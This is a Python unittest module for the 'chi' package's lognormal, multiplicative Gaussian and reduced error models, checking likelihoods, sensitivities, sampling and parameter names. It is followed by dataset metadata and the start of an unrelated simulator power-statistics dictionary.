            -5 * np.log(2 * np.pi) - 10 * (np.log(0.5) + np.log(1))
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        # Pointwise scores are one per observation and sum to the total.
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case I.2:
        parameters = [0.5]
        model_output = [10 * np.exp(parameters[0]**2 / 2)] * 6
        observations = [10] * 6
        ref_score = \
            -3 * np.log(2 * np.pi) - 6 * (np.log(0.5) + np.log(10))
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (6,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case II: If sigma = 1, the score reduces to
        # -np.log(2pi)/2 - log X - (log X - log X^m - 1/2)^2 / 2
        # Test case II.1:
        parameters = [1]
        model_output = [1] * 10
        observations = [2] * 10
        ref_score = \
            -5 * np.log(2 * np.pi) - 10 * np.log(2) \
            - 10 * (np.log(1) - np.log(2) - 1 / 2)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case II.2:
        parameters = [1]
        model_output = [1] * 10
        observations = [10] * 10
        ref_score = \
            -5 * np.log(2 * np.pi) - 10 * np.log(10) \
            - 10 * (np.log(1) - np.log(10) - 1 / 2)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III: -Infinity for not allowed regimes
        # (non-positive sigma, or non-positive model output since the
        # lognormal support is strictly positive)
        # Test case III.1: Zero sigma
        parameters = [0]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III.2: Negative sigma
        parameters = [-1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
        # Test case III.3: Zero model output
        parameters = [1]
        model_output = [0] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)
    def test_compute_log_likelihood_bad_input(self):
        # Model output and observations don't match
        parameters = [1]
        model_output = ['some', 'length']
        observations = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_log_likelihood(
                parameters, model_output, observations)
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_pointwise_ll(
                parameters, model_output, observations)
    def test_compute_sensitivities(self):
        # Test case I: If log X - log X^m = - sigma^2/2,
        # the scores reduce to
        # L = -np.log(2pi)/2 - np.log(sigma) - np.log(X)
        # dL/dpsi = 0
        # dL/dsigma = -1/sigma
        # Test case I.1:
        parameters = [0.5]
        model_output = [1 * np.exp(parameters[0]**2 / 2)] * 10
        observations = [1] * 10
        # dx/dpsi at each of the 10 time points: 1 w.r.t. psi_0, 2 w.r.t.
        # psi_1 (shape (n_times, n_parameters)).
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = \
            -5 * np.log(2 * np.pi) - 10 * (np.log(0.5) + np.log(1))
        ref_dpsi_0 = 0
        ref_dpsi_1 = 0
        ref_dsigma_base = -10 / (0.5)
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        # Sensitivities: (dpsi_0, dpsi_1, dsigma).
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        # Test case I.2:
        parameters = [0.5]
        model_output = [10 * np.exp(parameters[0]**2 / 2)] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = \
            -5 * np.log(2 * np.pi) - 10 * (np.log(0.5) + np.log(10))
        ref_dpsi_0 = 0
        ref_dpsi_1 = 0
        ref_dsigma_base = -10 / (0.5)
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        # Test case II: If sigma = 1, the scores reduce to
        # L = -np.log(2pi)/2 - log X - (log X - log X^m + 1 / 2) / 2
        # dL/dpsi = error * dx/dpsi
        # dL/dsigma_base = - 1 + error^2
        # Test case II.1:
        parameters = [1]
        model_output = [1] * 10
        observations = [2] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = \
            - 5 * np.log(2 * np.pi) - 10 * np.log(2) \
            - 10 * (np.log(1) - np.log(2) - 1 / 2)**2 / 2
        ref_dpsi_0 = 10 * (np.log(2) - np.log(1) + 1 / 2) / 1 * 1
        ref_dpsi_1 = 10 * (np.log(2) - np.log(1) + 1 / 2) / 1 * 2
        ref_dsigma_base = \
            -10 + 10 * (np.log(1) - np.log(2) - 1 / 2)**2 \
            - 10 * (np.log(2) - np.log(1) + 1 / 2)
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
        # Test case II.2:
        parameters = [1]
        model_output = [1] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = \
            - 5 * np.log(2 * np.pi) - 10 * np.log(10) \
            - 10 * (np.log(1) - np.log(10) - 1 / 2)**2 / 2
        ref_dpsi_0 = 10 * (np.log(10) - np.log(1) + 1 / 2) / 1 * 1
        ref_dpsi_1 = 10 * (np.log(10) - np.log(1) + 1 / 2) / 1 * 2
        ref_dsigma_base = \
            -10 + 10 * (np.log(1) - np.log(10) - 1 / 2)**2 \
            - 10 * (np.log(10) - np.log(1) + 1 / 2)
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_base)
    def test_compute_sensitivities_bad_input(self):
        # Model output and sensitivities don't match
        parameters = [1]
        model_output = ['some', 'length']
        observations = ['some', 'length']
        sens = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The first dimension of'):
            self.error_model.compute_sensitivities(
                parameters, model_output, sens, observations)
    def test_get_parameter_names(self):
        # Default parameter name of the one-parameter model.
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'Sigma log')
    def test_n_parameters(self):
        self.assertEqual(self.error_model.n_parameters(), 1)
    def test_sample(self):
        # Test I: sample size 1
        # Only the output shape is checked here (no pinned draw values).
        seed = 42
        parameters = [0.5]
        n_times = 3
        model_output = [1] * n_times
        sample = self.error_model.sample(parameters, model_output, seed=seed)
        n_samples = 1
        self.assertEqual(sample.shape, (n_times, n_samples))
        # Test II: sample size > 1
        n_samples = 4
        sample = self.error_model.sample(
            parameters, model_output, n_samples=n_samples, seed=seed)
        self.assertEqual(sample.shape, (n_times, n_samples))
    def test_sample_bad_input(self):
        # Too many parameters
        parameters = [1, 1, 1, 1, 1]
        model_output = [1] * 10
        with self.assertRaisesRegex(ValueError, 'The number of provided'):
            self.error_model.sample(parameters, model_output)
    def test_set_parameter_names(self):
        # Set parameter names
        names = ['some name']
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'some name')
        # Reset parameter names (None restores the default)
        names = None
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'Sigma log')
    def test_set_parameter_names_bad_input(self):
        # Not the right number of names
        names = ['Too', 'many', 'names']
        with self.assertRaisesRegex(ValueError, 'Length of names'):
            self.error_model.set_parameter_names(names)
class TestMultiplicativeGaussianErrorModel(unittest.TestCase):
    """
    Tests the chi.MultiplicativeGaussianErrorModel class.
    """
    # NOTE: docstring previously referenced the old package name
    # ``erlotinib``; the code under test lives in ``chi``.

    @classmethod
    def setUpClass(cls):
        # One shared error model instance for all tests.
        cls.error_model = chi.MultiplicativeGaussianErrorModel()

    def test_compute_log_likelihood(self):
        """
        Tests :meth:`compute_log_likelihood` and
        :meth:`compute_pointwise_ll`.
        """
        # Test case I: If X = X^m, the score reduces to
        # -np.log(2pi)/2 - np.log(sigma_tot)

        # Test case I.1:
        parameters = [0.1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.1 * 1)
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)

        # Test case I.2:
        parameters = [0.1]
        model_output = [10] * 6
        observations = [10] * 6
        ref_score = -3 * np.log(2 * np.pi) - 6 * np.log(0.1 * 10)
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (6,))
        self.assertAlmostEqual(np.sum(pw_score), score)

        # Test case II: If sigma_tot = 1, the score reduces to
        # -np.log(2pi)/2 - (X-X^m) / 2

        # Test case II.1:
        parameters = [1]
        model_output = [1] * 10
        observations = [2] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)

        # Test case II.2:
        parameters = [0.1]
        model_output = [10] * 10
        observations = [100] * 10
        ref_score = -5 * np.log(2 * np.pi) - 10 * (10 - 100)**2 / 2
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)

        # Test case III: -Infinity for not allowed regimes

        # Test case III.1: Zero sigma_rel
        parameters = [0]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)

        # Test case III.2: Negative sigma_rel
        parameters = [-1]
        model_output = [1] * 10
        observations = [1] * 10
        ref_score = -np.inf
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (10,))
        self.assertAlmostEqual(np.sum(pw_score), score)

    def test_compute_log_likelihood_bad_input(self):
        """Mismatched model output / observation lengths raise ValueError."""
        parameters = [0.1]
        model_output = ['some', 'length']
        observations = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_log_likelihood(
                parameters, model_output, observations)
        with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
            self.error_model.compute_pointwise_ll(
                parameters, model_output, observations)

    def test_compute_sensitivities(self):
        """Tests :meth:`compute_sensitivities` against hand-derived values."""
        # Test case I: If X = X^m, the scores reduce to
        # L = -np.log(2pi)/2 - np.log(sigma_tot)
        # dL/dpsi = -sigma_rel/sigma_tot * dx/dpsi
        # dL/dsigma_base = -1/sigma_tot
        # dL/dsigma_rel = -x/sigma_tot

        # Test case I.1:
        parameters = [0.1]
        model_output = [1] * 10
        observations = [1] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.1 * 1)
        ref_dpsi_0 = -10 * 0.1 / (0.1) * 1
        ref_dpsi_1 = -10 * 0.1 / (0.1) * 2
        ref_dsigma_rel = -10 / (0.1) * 1
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_rel)

        # Test case I.2:
        parameters = [0.1]
        model_output = [10] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.1 * 10)
        ref_dpsi_0 = -10 * 0.1 / (1) * 1
        ref_dpsi_1 = -10 * 0.1 / (1) * 2
        ref_dsigma_rel = -10 / (1) * 10
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_rel)

        # Test case II: If sigma_tot = 1, the scores reduce to
        # L = -np.log(2pi)/2 - (X-X^m) / 2
        # dL/dpsi = (-sigma_rel + error + error^2*sigma_rel) * dx/dpsi
        # dL/dsigma_base = - 1 + error^2
        # dL/dsigma_rel = - x + x*error^2

        # Test case II.1:
        parameters = [1]
        model_output = [1] * 10
        observations = [2] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
        ref_dpsi_0 = 10 * (-1 + 1 + 1 * 1) * 1
        ref_dpsi_1 = 10 * (-1 + 1 + 1 * 1) * 2
        ref_dsigma_rel = -10 + 10 * 1 * 1
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_rel)

        # Test case II.2:
        parameters = [1]
        model_output = [1] * 10
        observations = [10] * 10
        sens = np.array([[1] * 10, [2] * 10]).T
        ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
        ref_dpsi_0 = 10 * (-1 + 9 + 9**2 * 1) * 1
        ref_dpsi_1 = 10 * (-1 + 9 + 9**2 * 1) * 2
        ref_dsigma_rel = -10 + 10 * 9**2 * 1
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, sens, observations)
        self.assertAlmostEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertAlmostEqual(sens[0], ref_dpsi_0)
        self.assertAlmostEqual(sens[1], ref_dpsi_1)
        self.assertAlmostEqual(sens[2], ref_dsigma_rel)

    def test_compute_sensitivities_bad_input(self):
        """Sensitivities whose first dimension mismatches raise ValueError."""
        parameters = [0.1]
        model_output = ['some', 'length']
        observations = ['some', 'length']
        sens = ['some', 'other', 'length']
        with self.assertRaisesRegex(ValueError, 'The first dimension of'):
            self.error_model.compute_sensitivities(
                parameters, model_output, sens, observations)

    def test_get_parameter_names(self):
        """The model exposes exactly one parameter, named 'Sigma rel.'."""
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'Sigma rel.')

    def test_n_parameters(self):
        """The model reports a single free parameter."""
        self.assertEqual(self.error_model.n_parameters(), 1)

    def test_sample(self):
        """Sampling is reproducible for a fixed seed and correctly shaped."""
        # Test I: sample size 1
        seed = 42
        parameters = [2]
        n_times = 3
        model_output = [1, 10, 100]
        sample = self.error_model.sample(parameters, model_output, seed=seed)
        n_samples = 1
        self.assertEqual(sample.shape, (n_times, n_samples))
        # Regression values pinned for seed=42.
        self.assertAlmostEqual(sample[0, 0], 1.6094341595088628)
        self.assertAlmostEqual(sample[1, 0], -10.799682124809912)
        self.assertAlmostEqual(sample[2, 0], 250.09023916129144)

        # Test II: sample size > 1
        n_samples = 4
        sample = self.error_model.sample(
            parameters, model_output, n_samples=n_samples, seed=seed)
        self.assertEqual(sample.shape, (n_times, n_samples))
        self.assertAlmostEqual(sample[0, 0], 1.6094341595088628)
        self.assertAlmostEqual(sample[1, 0], -29.020703773076725)
        self.assertAlmostEqual(sample[2, 0], 96.63976849914224)
        self.assertAlmostEqual(sample[0, 1], -1.079968212480991)
        self.assertAlmostEqual(sample[1, 1], -16.043590137246362)
        self.assertAlmostEqual(sample[2, 1], -70.608785514716)
        self.assertAlmostEqual(sample[0, 2], 2.5009023916129145)
        self.assertAlmostEqual(sample[1, 2], 12.556808063345708)
        self.assertAlmostEqual(sample[2, 2], 275.8795949725657)
        self.assertAlmostEqual(sample[0, 3], 2.8811294327824277)
        self.assertAlmostEqual(sample[1, 3], 3.6751481531283563)
        self.assertAlmostEqual(sample[2, 3], 255.55838708578966)

    def test_sample_bad_input(self):
        """Providing too many parameters raises a ValueError."""
        parameters = [1, 1, 1, 1, 1]
        model_output = [1] * 10
        with self.assertRaisesRegex(ValueError, 'The number of provided'):
            self.error_model.sample(parameters, model_output)

    def test_set_parameter_names(self):
        """Parameter names can be overridden and reset to the default."""
        # Set parameter names
        names = ['some name']
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'some name')

        # Reset parameter names
        names = None
        self.error_model.set_parameter_names(names)
        parameters = self.error_model.get_parameter_names()
        self.assertEqual(len(parameters), 1)
        self.assertEqual(parameters[0], 'Sigma rel.')

    def test_set_parameter_names_bad_input(self):
        """A name list of the wrong length raises a ValueError."""
        names = ['Too', 'many', 'names']
        with self.assertRaisesRegex(ValueError, 'Length of names'):
            self.error_model.set_parameter_names(names)
class TestReducedErrorModel(unittest.TestCase):
    """
    Tests the chi.ReducedErrorModel class.
    """
    # NOTE: docstring previously referenced the old package name
    # ``erlotinib``; the code under test lives in ``chi``.

    @classmethod
    def setUpClass(cls):
        # Wrap a two-parameter error model so parameters can be fixed.
        error_model = chi.ConstantAndMultiplicativeGaussianErrorModel()
        cls.error_model = chi.ReducedErrorModel(error_model)

    def test_bad_instantiation(self):
        """Wrapping a non-error-model object raises a ValueError."""
        model = 'Bad type'
        with self.assertRaisesRegex(ValueError, 'The error model'):
            chi.ReducedErrorModel(model)

    def test_compute_log_likelihood(self):
        """
        Tests :meth:`compute_log_likelihood` and
        :meth:`compute_pointwise_ll`.
        """
        # Test case I: fix some parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': 0.1})

        # Compute log-likelihood with the reduced (one-parameter) model
        parameters = [0.2]
        model_output = [1, 2, 3, 4]
        observations = [2, 3, 4, 5]
        pw_score = self.error_model.compute_pointwise_ll(
            parameters, model_output, observations)
        score = self.error_model.compute_log_likelihood(
            parameters, model_output, observations)

        # Compute ref score with original error model and full parameters
        parameters = [0.1, 0.2]
        error_model = self.error_model.get_error_model()
        ref_score = error_model.compute_log_likelihood(
            parameters, model_output, observations)
        self.assertEqual(score, ref_score)
        self.assertEqual(pw_score.shape, (4,))
        self.assertAlmostEqual(np.sum(pw_score), ref_score)

        # Unfix model parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': None})

    def test_compute_sensitivities(self):
        """Sensitivities of fixed parameters are filtered out of the output."""
        # Test case I: fix some parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': 0.1})

        # Compute log-likelihood and sensitivities
        parameters = [0.2]
        model_output = [1, 2, 3, 4]
        observations = [2, 3, 4, 5]
        m_sens = np.array([[1, 2, 3, 4], [1, 1, 1, 1]]).T
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, m_sens, observations)

        # Compute ref score with original error model
        parameters = [0.1, 0.2]
        error_model = self.error_model.get_error_model()
        ref_score, ref_sens = error_model.compute_sensitivities(
            parameters, model_output, m_sens, observations)
        self.assertEqual(score, ref_score)
        self.assertEqual(len(sens), 3)
        self.assertEqual(len(ref_sens), 4)
        self.assertEqual(sens[0], ref_sens[0])
        self.assertEqual(sens[1], ref_sens[1])
        # Index 2 of the full model is the fixed 'Sigma base' sensitivity,
        # which the reduced model omits.
        self.assertEqual(sens[2], ref_sens[3])

        # Unfix model parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': None})

        # Compute log-likelihood and sensitivities with all parameters free
        parameters = [0.1, 0.2]
        score, sens = self.error_model.compute_sensitivities(
            parameters, model_output, m_sens, observations)
        self.assertEqual(score, ref_score)
        self.assertEqual(len(sens), 4)
        self.assertEqual(len(ref_sens), 4)
        self.assertEqual(sens[0], ref_sens[0])
        self.assertEqual(sens[1], ref_sens[1])
        self.assertEqual(sens[2], ref_sens[2])
        self.assertEqual(sens[3], ref_sens[3])

    def test_fix_parameters(self):
        """Fixing, re-fixing and unfixing parameters updates the model."""
        # Test case I: fix some parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma rel.': 1})
        n_parameters = self.error_model.n_parameters()
        self.assertEqual(n_parameters, 1)
        parameter_names = self.error_model.get_parameter_names()
        self.assertEqual(len(parameter_names), 1)
        self.assertEqual(parameter_names[0], 'Sigma base')

        # Test case II: fix overlapping set of parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': 0.2,
            'Sigma rel.': 0.1})
        n_parameters = self.error_model.n_parameters()
        self.assertEqual(n_parameters, 0)
        parameter_names = self.error_model.get_parameter_names()
        self.assertEqual(len(parameter_names), 0)

        # Test case III: unfix all parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': None,
            'Sigma rel.': None})
        n_parameters = self.error_model.n_parameters()
        self.assertEqual(n_parameters, 2)
        parameter_names = self.error_model.get_parameter_names()
        self.assertEqual(len(parameter_names), 2)
        self.assertEqual(parameter_names[0], 'Sigma base')
        self.assertEqual(parameter_names[1], 'Sigma rel.')

    def test_fix_parameters_bad_input(self):
        """A non-dict argument raises a ValueError."""
        name_value_dict = 'Bad type'
        with self.assertRaisesRegex(ValueError, 'The name-value dictionary'):
            self.error_model.fix_parameters(name_value_dict)

    def test_get_error_model(self):
        """The wrapped model is returned and is a chi.ErrorModel."""
        error_model = self.error_model.get_error_model()
        self.assertIsInstance(error_model, chi.ErrorModel)

    def test_n_fixed_parameters(self):
        """The count of fixed parameters tracks fixing and unfixing."""
        # Test case I: fix some parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': 0.1})
        self.assertEqual(self.error_model.n_fixed_parameters(), 1)

        # Unfix all parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': None})
        self.assertEqual(self.error_model.n_fixed_parameters(), 0)

    def test_n_parameters(self):
        """The unreduced model reports two free parameters."""
        n_parameters = self.error_model.n_parameters()
        self.assertEqual(n_parameters, 2)

    def test_sample(self):
        """Sampling with fixed parameters matches the full model's samples."""
        # Test case I: fix some parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': 0.1})

        # Sample from the reduced model
        seed = 42
        n_samples = 1
        parameters = [0.2]
        model_output = [1, 2, 3, 4]
        samples = self.error_model.sample(
            parameters, model_output, n_samples, seed)

        # Compute reference samples with original error model
        parameters = [0.1, 0.2]
        error_model = self.error_model.get_error_model()
        ref_samples = error_model.sample(
            parameters, model_output, n_samples, seed)
        self.assertEqual(samples.shape, (4, 1))
        self.assertEqual(ref_samples.shape, (4, 1))
        self.assertEqual(samples[0, 0], ref_samples[0, 0])
        self.assertEqual(samples[1, 0], ref_samples[1, 0])
        self.assertEqual(samples[2, 0], ref_samples[2, 0])
        self.assertEqual(samples[3, 0], ref_samples[3, 0])

        # Unfix model parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': None})

    def test_set_get_parameter_names(self):
        """Names can be set and reset, also while parameters are fixed."""
        # Set some parameter names
        self.error_model.set_parameter_names(['Test 1', 'Test 2'])
        names = self.error_model.get_parameter_names()
        self.assertEqual(len(names), 2)
        self.assertEqual(names[0], 'Test 1')
        self.assertEqual(names[1], 'Test 2')

        # Reset to defaults
        self.error_model.set_parameter_names(None)
        names = self.error_model.get_parameter_names()
        self.assertEqual(len(names), 2)
        self.assertEqual(names[0], 'Sigma base')
        self.assertEqual(names[1], 'Sigma rel.')

        # Fix parameter and set parameter name
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': 1})
        self.error_model.set_parameter_names(
            ['myokit.tumour_volume Sigma rel.'])
        names = self.error_model.get_parameter_names()
        self.assertEqual(len(names), 1)
        self.assertEqual(names[0], 'myokit.tumour_volume Sigma rel.')

        # Reset to defaults
        self.error_model.set_parameter_names(None)
        names = self.error_model.get_parameter_names()
        self.assertEqual(len(names), 1)
        self.assertEqual(names[0], 'Sigma rel.')

        # Unfix model parameters
        self.error_model.fix_parameters(name_value_dict={
            'Sigma base': None})

    def test_set_parameter_names_bad_input(self):
        """Wrong-length lists and over-long names raise ValueErrors."""
        # Wrong number of names
        names = ['Wrong length']
        with self.assertRaisesRegex(ValueError, 'Length of names does not'):
            self.error_model.set_parameter_names(names)

        # A parameter exceeds 50 characters
        names = [
            '0123456789-0123456789-0123456789-0123456789-0123456789-012345678',
            'Sigma base']
        with self.assertRaisesRegex(ValueError, 'Parameter names cannot'):
            self.error_model.set_parameter_names(names)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 37.367039
| 79
| 0.614426
| 7,122
| 56,910
| 4.718478
| 0.030188
| 0.058325
| 0.071656
| 0.055617
| 0.937271
| 0.904508
| 0.88954
| 0.872281
| 0.857313
| 0.842761
| 0
| 0.0535
| 0.270199
| 56,910
| 1,522
| 80
| 37.39159
| 0.755616
| 0.098401
| 0
| 0.839423
| 0
| 0
| 0.030855
| 0.001254
| 0
| 0
| 0
| 0
| 0.298077
| 1
| 0.061538
| false
| 0
| 0.002885
| 0
| 0.070192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98ef6584bd95a075dbc92a23dc5f332a334d2483
| 68,627
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_ml_deepnet/cmp_bwavesgcccactusADMmilc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_ml_deepnet/cmp_bwavesgcccactusADMmilc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_ml_deepnet/cmp_bwavesgcccactusADMmilc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.113472,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.291815,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
